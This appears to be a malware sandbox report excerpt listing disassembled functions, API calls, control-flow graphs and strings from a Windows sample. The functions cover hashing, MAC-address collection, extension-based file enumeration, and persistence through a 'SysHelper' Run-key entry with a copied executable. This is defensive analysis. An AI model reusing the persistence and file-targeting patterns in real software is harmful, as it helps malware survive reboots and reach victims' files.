                                                                                                                                                    APIs
                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                                                                                    • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                                                                    • _memset.LIBCMT ref: 004110CA
                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                                                                    • _malloc.LIBCMT ref: 00411100
                                                                                                                                                    • _memset.LIBCMT ref: 0041110B
                                                                                                                                                    • _sprintf.LIBCMT ref: 0041112E
                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                                                    • String ID: %.2X
                                                                                                                                                    • API String ID: 2451520719-213608013
                                                                                                                                                    • Opcode ID: 58767ee62d541c0ac93fa7b2988ab1e5126a7052be10478fd2962cce1534a85e
                                                                                                                                                    • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                                                                                    • Opcode Fuzzy Hash: 58767ee62d541c0ac93fa7b2988ab1e5126a7052be10478fd2962cce1534a85e
                                                                                                                                                    • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                                                                      • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                                                                      • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                                                                    • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 0040F900
                                                                                                                                                    • _memmove.LIBCMT ref: 0040F9EA
                                                                                                                                                    • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                                                                                    • _memmove.LIBCMT ref: 0040FADA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 273148273-0
                                                                                                                                                    • Opcode ID: b722e78c9ebd10f63d73c3d880eb8fa3e0c54201061ed3de32a6a78e36f40bca
                                                                                                                                                    • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                                                                                    • Opcode Fuzzy Hash: b722e78c9ebd10f63d73c3d880eb8fa3e0c54201061ed3de32a6a78e36f40bca
                                                                                                                                                    • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1885 40e870-40e8d6 call 4156d0 CryptAcquireContextW 1888 40e8d8-40e8e4 call 430eca 1885->1888 1889 40e8e9-40e901 CryptCreateHash 1885->1889 1888->1889 1891 40e903-40e90f call 430eca 1889->1891 1892 40e914-40e930 CryptHashData 1889->1892 1891->1892 1894 40e932-40e93e call 430eca 1892->1894 1895 40e943-40e961 CryptGetHashParam 1892->1895 1894->1895 1897 40e963-40e96f call 430eca 1895->1897 1898 40e974-40e9a6 call 420be4 call 42b420 CryptGetHashParam 1895->1898 1897->1898 1904 40e9a8-40e9b4 call 430eca 1898->1904 1905 40e9b9-40e9bb 1898->1905 1904->1905 1907 40e9c0-40e9c3 1905->1907 1908 40ea10-40ea31 call 422110 CryptDestroyHash CryptReleaseContext 1907->1908 1909 40e9c5-40e9df call 4204a6 1907->1909 1914 40ea33-40ea3b call 422587 1908->1914 1915 40ea3e-40ea50 1908->1915 1916 40e9e1-40e9f0 call 413ea0 1909->1916 1917 40e9f2-40e9f5 1909->1917 1914->1915 1916->1907 1920 40e9f8-40e9fd 1917->1920 1920->1920 1921 40e9ff-40ea0e call 413ea0 1920->1921 1921->1907
                                                                                                                                                    APIs
                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                                                                    • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                                                                    • _memset.LIBCMT ref: 0040E98E
                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                                                                    • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                                                    • String ID: %.2X
                                                                                                                                                    • API String ID: 1084002244-213608013
                                                                                                                                                    • Opcode ID: 0020aaaefdb6c4dcb4bf3e2ceb4008ce88efa9caebdce230c40b083e7cee562a
                                                                                                                                                    • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                                                                                    • Opcode Fuzzy Hash: 0020aaaefdb6c4dcb4bf3e2ceb4008ce88efa9caebdce230c40b083e7cee562a
                                                                                                                                                    • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1926 40eaa0-40eb09 call 4156d0 CryptAcquireContextW 1929 40eb0b-40eb17 call 430eca 1926->1929 1930 40eb1c-40eb34 CryptCreateHash 1926->1930 1929->1930 1932 40eb36-40eb42 call 430eca 1930->1932 1933 40eb47-40eb56 CryptHashData 1930->1933 1932->1933 1935 40eb58-40eb64 call 430eca 1933->1935 1936 40eb69-40eb87 CryptGetHashParam 1933->1936 1935->1936 1938 40eb89-40eb95 call 430eca 1936->1938 1939 40eb9a-40ebcc call 420be4 call 42b420 CryptGetHashParam 1936->1939 1938->1939 1945 40ebce-40ebda call 430eca 1939->1945 1946 40ebdf 1939->1946 1945->1946 1948 40ebe1-40ebe4 1946->1948 1949 40ebe6-40ec00 call 4204a6 1948->1949 1950 40ec38-40ec67 call 422110 CryptDestroyHash CryptReleaseContext 1948->1950 1955 40ec02-40ec11 call 413ea0 1949->1955 1956 40ec13-40ec19 1949->1956 1955->1948 1958 40ec20-40ec25 1956->1958 1958->1958 1960 40ec27-40ec36 call 413ea0 1958->1960 1960->1948
                                                                                                                                                    APIs
                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000,00000000,?), ref: 0040EB01
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                                                                    • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0040EB4E
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040EB83
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                                                                    • _memset.LIBCMT ref: 0040EBB4
                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                                                                    • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                                                    • String ID: %.2X
                                                                                                                                                    • API String ID: 1637485200-213608013
                                                                                                                                                    • Opcode ID: 3c969f350820ba706d19a7227015f75167d650bfbf9457a4931adb697a62dd31
                                                                                                                                                    • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                                                                                    • Opcode Fuzzy Hash: 3c969f350820ba706d19a7227015f75167d650bfbf9457a4931adb697a62dd31
                                                                                                                                                    • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1963 40e670-40e697 call 420c62 * 2 1968 40e6b4-40e6c2 GetAdaptersInfo 1963->1968 1969 40e699-40e6b3 call 421f2d call 420bed 1963->1969 1971 40e6c4-40e6d9 call 420bed call 420c62 1968->1971 1972 40e6db-40e6e8 GetAdaptersInfo 1968->1972 1971->1969 1971->1972 1975 40e744-40e754 call 420bed 1972->1975 1976 40e6ea-40e73c call 4204a6 call 421f2d * 2 1972->1976 1989 40e741 1976->1989 1989->1975
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 0040E67F
                                                                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00710000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                                                                    • _malloc.LIBCMT ref: 0040E68B
                                                                                                                                                    • _wprintf.LIBCMT ref: 0040E69E
                                                                                                                                                    • _free.LIBCMT ref: 0040E6A4
                                                                                                                                                      • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C01
                                                                                                                                                      • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C13
                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                                                                    • _free.LIBCMT ref: 0040E6C5
                                                                                                                                                    • _malloc.LIBCMT ref: 0040E6CD
                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                                                                    • _sprintf.LIBCMT ref: 0040E720
                                                                                                                                                    • _wprintf.LIBCMT ref: 0040E732
                                                                                                                                                    • _wprintf.LIBCMT ref: 0040E73C
                                                                                                                                                    • _free.LIBCMT ref: 0040E745
                                                                                                                                                    Strings
                                                                                                                                                    • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                                                                    • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                                                                    • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                                                    • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                                                    • API String ID: 3901070236-1604013687
                                                                                                                                                    • Opcode ID: 86116fd0c9e432b104d34220e70c2ad806a44289ccaa01368c67fdd59d26a7a7
                                                                                                                                                    • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                                                                                    • Opcode Fuzzy Hash: 86116fd0c9e432b104d34220e70c2ad806a44289ccaa01368c67fdd59d26a7a7
                                                                                                                                                    • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2367 40fb98-40fb9f 2368 40fba0-40fbb9 2367->2368 2368->2368 2369 40fbbb-40fbcf 2368->2369 2370 40fbd1 2369->2370 2371 40fbd3-40fc02 PathAppendW call 418400 2369->2371 2370->2371 2374 40fc04-40fc0c call 422587 2371->2374 2375 40fc0f-40fc29 2371->2375 2374->2375 2376 40fc49-40fc4c 2375->2376 2377 40fc2b-40fc2f 2375->2377 2381 40fc4f-40fc6b PathFileExistsW 2376->2381 2380 40fc31-40fc47 call 4205a0 2377->2380 2377->2381 2380->2381 2383 40fc6d-40fc86 call 420c62 2381->2383 2384 40fcdf-40fce5 2381->2384 2394 40fc88 2383->2394 2395 40fc8a-40fc9f lstrcpyW 2383->2395 2386 40fcf0-40fd07 call 417140 2384->2386 2387 40fce7-40fced call 422587 2384->2387 2396 40fd09 2386->2396 2397 40fd0b-40fd20 FindFirstFileW 2386->2397 2387->2386 2394->2395 2398 40fca1 2395->2398 2399 40fca3-40fcdc lstrcatW call 414690 call 40f0e0 call 420bed 2395->2399 2396->2397 2400 40fd30-40fd4c 2397->2400 2401 40fd22-40fd2d call 422587 2397->2401 2398->2399 2399->2384 2404 40fd52-40fd55 2400->2404 2405 410072-410076 2400->2405 2401->2400 2409 40fd60-40fd6b 2404->2409 2410 410086-4100a4 2405->2410 2411 410078-410083 call 422587 2405->2411 2415 40fd70-40fd76 2409->2415 2412 4100b1-4100c9 2410->2412 2413 4100a6-4100ae call 422587 2410->2413 2411->2410 2419 4100d6-4100ee 2412->2419 2420 4100cb-4100d3 call 422587 2412->2420 2413->2412 2421 40fd96-40fd98 2415->2421 2422 40fd78-40fd7b 2415->2422 2433 4100f0-4100f8 call 422587 2419->2433 2434 4100fb-41010b 2419->2434 2420->2419 2430 40fd9b-40fd9d 2421->2430 2427 40fd92-40fd94 2422->2427 2428 40fd7d-40fd85 2422->2428 2427->2430 2428->2421 2432 40fd87-40fd90 2428->2432 2435 410052-410065 FindNextFileW 2430->2435 2436 40fda3-40fdae 2430->2436 2432->2415 2432->2427 2433->2434 2435->2409 2438 41006b-41006c FindClose 2435->2438 2439 40fdb0-40fdb6 2436->2439 2438->2405 2441 40fdd6-40fdd8 2439->2441 2442 40fdb8-40fdbb 2439->2442 2443 40fddb-40fddd 2441->2443 2444 40fdd2-40fdd4 2442->2444 2445 40fdbd-40fdc5 2442->2445 2443->2435 2446 40fde3-40fdea 2443->2446 2444->2443 2445->2441 2447 40fdc7-40fdd0 2445->2447 2448 40fdf0-40fe71 call 417140 call 415ae0 call 414690 call 413b70 2446->2448 2449 40fec2-40fecc 2446->2449 2447->2439 2447->2444 2473 40fe81-40fea9 2448->2473 2474 40fe73-40fe7e call 422587 2448->2474 2451 40feda-40fede 2449->2451 2452 40fece-40fed5 call 411ab0 2449->2452 2451->2435 2455 40fee4-40ff13 call 414690 2451->2455 2452->2451 2461 40ff15-40ff17 2455->2461 2462 40ff19-40ff1f 2455->2462 2464 40ff31-40ff6a call 415ae0 PathFindExtensionW 2461->2464 2465 40ff22-40ff2b 2462->2465 2471 40ff9a-40ffa8 2464->2471 2472 40ff6c 2464->2472 2465->2465 2468 40ff2d-40ff2f 2465->2468 2468->2464 2477 40ffda-40ffde 2471->2477 2478 40ffaa 2471->2478 2476 40ff70-40ff74 2472->2476 2473->2435 2475 40feaf-40febd call 422587 2473->2475 2474->2473 2475->2435 2481 40ff76-40ff78 2476->2481 2482 40ff7a 2476->2482 2483 40ffe0-40ffe9 2477->2483 2484 41003a-410042 2477->2484 2485 40ffb0-40ffb4 2478->2485 2490 40ff7c-40ff88 call 421c02 2481->2490 2482->2490 2493 40ffeb 2483->2493 2494 40ffed-40fff9 call 421c02 2483->2494 2491 410044-41004c call 422587 2484->2491 2492 41004f 2484->2492 2487 40ffb6-40ffb8 2485->2487 2488 40ffba 2485->2488 2495 40ffbc-40ffce call 421c02 2487->2495 2488->2495 2504 40ff93 2490->2504 2505 40ff8a-40ff8f 2490->2505 2491->2492 2492->2435 2493->2494 2494->2484 2506 40fffb-41000b 2494->2506 2495->2484 2507 40ffd0-40ffd5 2495->2507 2509 40ff97 2504->2509 2505->2476 2508 40ff91 2505->2508 2510 41000d 2506->2510 2511 41000f-410026 call 421c02 2506->2511 2507->2485 2513 40ffd7 2507->2513 2508->2509 2509->2471 2510->2511 2511->2484 2515 410028-410035 call 4111c0 2511->2515 2513->2477 2515->2484
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3232302685-0
                                                                                                                                                    • Opcode ID: ae7ea077d65420c2cc746b0e5ac00ffee133b211b9d00d2078cb03522529639b
                                                                                                                                                    • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                                                                                                                                                    • Opcode Fuzzy Hash: ae7ea077d65420c2cc746b0e5ac00ffee133b211b9d00d2078cb03522529639b
                                                                                                                                                    • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 985 411cd0-411d1a call 42f7c0 RegOpenKeyExW 988 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 985->988 989 412207-412216 985->989 992 411d93-411d9c 988->992 993 411d8f-411d91 988->993 995 411da0-411da9 992->995 994 411daf-411dcb call 415c10 993->994 999 411dd1-411df8 lstrlenA call 413520 994->999 1000 411e7c-411e87 994->1000 995->995 996 411dab-411dad 995->996 996->994 1006 411e28-411e2c 999->1006 1007 411dfa-411dfe 999->1007 1001 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 1000->1001 1002 411e89-411e91 call 422587 1000->1002 1014 411f36-411f38 1001->1014 1015 411f3a-411f3f 1001->1015 1002->1001 1012 411e3c-411e50 PathFileExistsW 1006->1012 1013 411e2e-411e39 call 422587 1006->1013 1010 411e00-411e08 call 422587 1007->1010 1011 411e0b-411e23 call 4145a0 1007->1011 1010->1011 1011->1006 1012->1000 1021 411e52-411e57 1012->1021 1013->1012 1019 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 1014->1019 1020 411f40-411f49 1015->1020 1033 411f98-411fa0 1019->1033 1034 411fce-411fe9 1019->1034 1020->1020 1024 411f4b-411f4d 1020->1024 1025 411e59-411e5e 1021->1025 1026 411e6a-411e6e 1021->1026 1024->1019 1025->1026 1029 411e60-411e65 call 414690 1025->1029 1026->989 1028 411e74-411e77 1026->1028 1031 4121ff-412204 call 422587 1028->1031 1029->1026 1031->989 1036 411fa2-411fa4 1033->1036 1037 411fa6-411faf 1033->1037 1038 411feb-411fed 1034->1038 1039 411fef-411ff8 1034->1039 1041 411fbf-411fc9 call 415c10 1036->1041 1042 411fb0-411fb9 1037->1042 1043 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1038->1043 1044 412000-412009 1039->1044 1041->1034 1042->1042 1045 411fbb-411fbd 1042->1045 1050 4121d1-4121d5 1043->1050 1051 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1043->1051 1044->1044 1047 41200b-41200d 1044->1047 1045->1041 1047->1043 1052 4121e2-4121fa 1050->1052 1053 4121d7-4121df call 422587 1050->1053 1058 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1051->1058 1059 412109-412110 call 413260 1051->1059 1052->989 1057 4121fc 1052->1057 1053->1052 1057->1031 1064 4121b2-4121b8 1058->1064 1065 4121aa-4121b0 GetLastError 1058->1065 1059->1058 1066 4121c0-4121cf WaitForSingleObject 1064->1066 1065->1050 1066->1050 1066->1066
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                                    • _memset.LIBCMT ref: 00411D3B
                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                                    • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                                    • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                                                                    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                                                                                                                                                    • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                                                                    • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                                                                    • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                                                                    • PathAppendW.SHLWAPI(?,?), ref: 00411F83
